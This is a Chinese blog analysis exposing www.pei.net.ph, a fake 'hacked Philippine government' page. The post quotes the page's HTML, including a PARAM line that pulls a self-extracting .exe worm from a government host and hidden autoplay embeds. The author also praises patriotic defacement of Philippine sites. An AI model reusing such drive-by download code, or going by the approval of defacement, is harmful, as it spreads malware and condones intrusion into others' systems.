对于www.pei.net.ph仿冒入侵菲律宾网站的整体性分析
菲律宾事件后,网络上闹的沸沸扬扬,当然有一些爱国青年,无论所谓红客,黑阔,只能说做信息安全的,还是做了一定的反击,当然也攻破了部分菲律宾政府的某些网站,当然一想起传说中的菲律宾政府被攻破,如果安全圈里的,第一个能想起的估计是"小A"了,也不知道这家伙到底哪里高就去,哈哈,一年联系不上他了,莫非被和谐了??(好了主题不跑偏说正事)
当红阔,黑阔攻破菲律宾政府网站的同时嘛,虽然安全不到位,但是发现一定会被改回的,圈内如果参与过"伊朗网军"反击战事件的盆友们,应该很了解,攻破,篡改,改回,再篡改的过程,技术领域虽然菲律宾政府技术不到位,但是管理人员改回的能力还是有的,之后很多人就要问,最近经常看到www.pei.net.ph 这个自称攻破菲律宾政府网站为什么迟迟没有改回呢?而且大肆宣传呢?其实很多技术圈的人都明白这道理,不过对于不知道网络技术的人,就过度的膜拜了,还以为真正遇到传说中的大神,管理员都改不回来?
有技术的大牛黑站,挂黑页走人,留名就好,没技术的,只能想想办法,用别的来炒作炒作,当然炒作也要有利益的,要么是名义上的利益,要么就是实际性的利益.当然介绍这个的时候,我们可以整体分析一下对于这个站的基本思路,首先net.ph域名为菲律宾国家域名没错,但是其注册只需要有一个可以开海外接口的IDC就可以注册,国内无法查询whois 但是国外接口可以,查询whois信息,时间有心的自己查吧,今年的米,呵呵,
分析数据一.
菲律宾国家米持有有三种,一种是 .PH 之后是org.PH 最后就是我们看到的net.PH米.(当然政府网关的GOV.PH不放在内),我们分析一下网关地址.可以查询到网关为: lamitan.gov.ph ,好吧,虽然IP地址是菲律宾的,但是网关地址是美国的,呵呵,这一点我想我们已经可以说明一些简明的问题了,四月份的米,注册的是菲律宾通用域名,继续看下一条!
分析数据二.
对整站渗透了一次,除了根目录的HTML文件,没有其它任何文件痕迹,也就是说这个站点上只有这一个黑页,要知道真正有技术的任意一个技术圈的,都是不删除数据,只挂黑页走人的,哪怕对方多过分,这是我们自认为还算圈内自觉的东西,但是这里只有一个HTML页面,其它的图片信息都是从懒人图库调用过来的,当然这里有闪亮的一点,在文件里 有这样的 一条链接www.jb51.net <PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"> 本人也算是VB蠕虫出身,看到这里不用多说,exe自解压,呵呵,让我联想到各种远控.,呵呵,自解压,自发性,350k 蠕虫病毒, 说句实话,技术有够烂的,蠕虫这么大,如果网速卡点的,还得卡半天,正常蠕虫如果技术好点的,做上免杀也应该在60K左右,
分析数据三
查看文件第15行<PARAM NAME="URL" VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3"> 之后再查看204行<EMBED src=http://www.7jz8.com/12.mp3 hidden=true type=audio/x-ms-wma LOOP="true" AUTOSTART="true"></EMBED> 我们发现他写了两段的音乐播放代码,也就是说,这个人连基本的HTML语音都没学明白,一定在网上下载的现成的黑页模板,之后就挂上去的,当然后面的这句是作废的,是没有用的,
分析数据四
谷歌搜索,国外的网站如果年头久的话都是有GG收录的,你可以site:www.pei.net.ph 一下,呵呵,答案是没收录,
好吧,总结一下,有人故意做了这样一个挂着自解压病毒的黑页独立页面网站,以黑了菲律宾政府网站为由,用着随意人就可以注册的域名架设了这样的一个站,用以何为?大肆宣传有多少人中了这135pk?肆意宣传只是为了更多人的访问,多一个访问就能多抓一只肉鸡,很多人不理解为什么杀软没报毒,如果你现在换成卡巴斯基去查毒,你看能不能查到DIE的蠕虫病毒,菲律宾政府网站为gov.ph 米,跟中国的gov.cn 异曲同工, .PH域名国外接口注册80元每年, 独立IP VPS,低配1G 正常市场价格在60 -100元/月,但是换来的肉鸡是多少?每天有多少人来点击这个网站,成为获益的肉鸡呢?
飞了宾的网站被黑了是该高兴,但是也要看看什么目的是黑站的,对于这样的人,我们只能以唾骂来形容不耻行为,好自为之吧!孩子!
By : Quu
相关文章
- 今天我要讲的是:如何成为一名真正的优秀的道德黑客?不管是新手还是老手,有兴趣的朋友们都可以看一看2023-07-03
- 这篇文章主要介绍了白帽黑客、灰帽黑客、黑帽黑客三者的区别介绍,需要的朋友可以参考下2023-07-03
什么是DDoS攻击?CC攻击?cc攻击与ddos攻击区别小结
CC和DDoS都是我们最长听到的黑客攻击手段,那么它们有什么区别呢?CC攻击会造成什么后果呢?也可通过这篇文章了解更多的CC攻击知识:什么是CC攻击?怎么防御CC攻击?谁的威2023-07-03- 这篇文章主要介绍了Struts2 S2-016漏洞修复总结,需要的朋友可以参考下2016-08-20
- Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站2016-08-20
- 还记得我们之前说过的有个白帽子提交了世纪佳缘的漏洞然后被世纪佳缘告了的事情吗?这件事情引起了国内很多白帽黑帽的关注,如今事情又发酵,中国最大的两大漏洞平台——乌2016-07-20
- 未来的互联网最重要的不是速度,不是容量,而是安全。黑客这个词很多人已经耳熟能详,虽然他们是一群神秘的人,但不能判断他们是不是好人,越厉害的往往威胁越大。其实有一2016-07-15
- 支付宝花呗是支付宝提供的第三方信用平台,根据你的消费购物信用给你透支额度,给很多不想办信用卡的人带来了很多方便,但是,最近出现的利用花呗套现的人,却在不知不觉中2016-07-14
- 有一天打开电脑,发现电脑已经被锁住,窗口弹出说明:如果你不给钱,就把你的电脑清空,这就是遇到了勒索软件。近年来,这种勒索已经频频出现在安卓手机上,手机里的重要资2016-07-11
- 互联网的发展已经步入稳定期,未来不会像之前那样呈现爆发性增长的状况了,那么未来的网络谁是主角?是安全。云计算与大数据在为我们的生活工作带来方便的同时,也面临着从2016-06-28
最新评论